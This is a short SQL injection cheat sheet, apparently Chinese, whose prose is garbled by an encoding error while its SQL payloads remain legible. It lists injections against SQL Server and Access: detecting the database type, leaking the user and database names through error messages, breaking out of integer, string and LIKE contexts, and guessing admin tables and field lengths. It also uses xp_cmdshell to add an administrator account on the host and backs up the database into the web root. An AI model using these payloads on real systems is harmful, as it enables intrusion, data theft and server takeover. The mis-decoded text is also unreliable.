sql×¢Èë

ÅжÏÊý¾Ý¿âÀàÐÍ
(select count(*) fromsysobjects)>0  //sqlÊý¾Ý¿â
(select count(*) from msysobjects)>0 //accessÊý¾Ý¿â
µÃµ½SqlÓû§Ãû
 user>0
Conversion failed when converting the nvarchar value 'dbo' to data type int.
Öع¹SQLÓï¾ä
ÕûÊýÐÍ
(A) ID=49 ID=49 And [ ²éѯÌõ¼þ] £¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=49 And [ ²éѯÌõ¼þ]
×Ö·ûÐÍ
(B) Class= Á¬Ðø¾ç
×¢ÈëµÄ²ÎÊýΪClass= Á¬Ðø¾ç’ and [ ²éѯÌõ¼þ] and ‘’= ’ £¬
(C)like ’% ¹Ø¼ü×Ö% ’
keyword= ’ and [ ²éѯÌõ¼þ] and ‘%25 ’= ’£¬
²Â±íÃû
And (Select Count(*) from Admin)>=0
²Â³¤¶È
and (select top 1 len(username) from Admin)>0
н¨Óû§Ãû
exec master..xp_cmdshell "net user name password /add"--
master..xp_cmdshell "net localgroup administrators name /add"--
db_name()>0 Ç°ÃæÓиöÀàËƵÄÀý×Óand user>0 £¬×÷ÓÃÊÇ»ñÈ¡Á¬½ÓÓû§Ãû£¬db_name() ÊÇÁíÒ»¸öϵͳ±äÁ¿£¬·µ»ØµÄÊÇÁ¬½ÓµÄÊý¾Ý¿âÃû¡£
backup database Êý¾Ý¿âÃû to disk= ’c:\inetpub\wwwroot\1.db ’;--
and (Select Top 1 name from sysobjects where xtype='U' )>0 Ç°Ãæ˵¹ý£¬sysobjects ÊÇSQLServer µÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬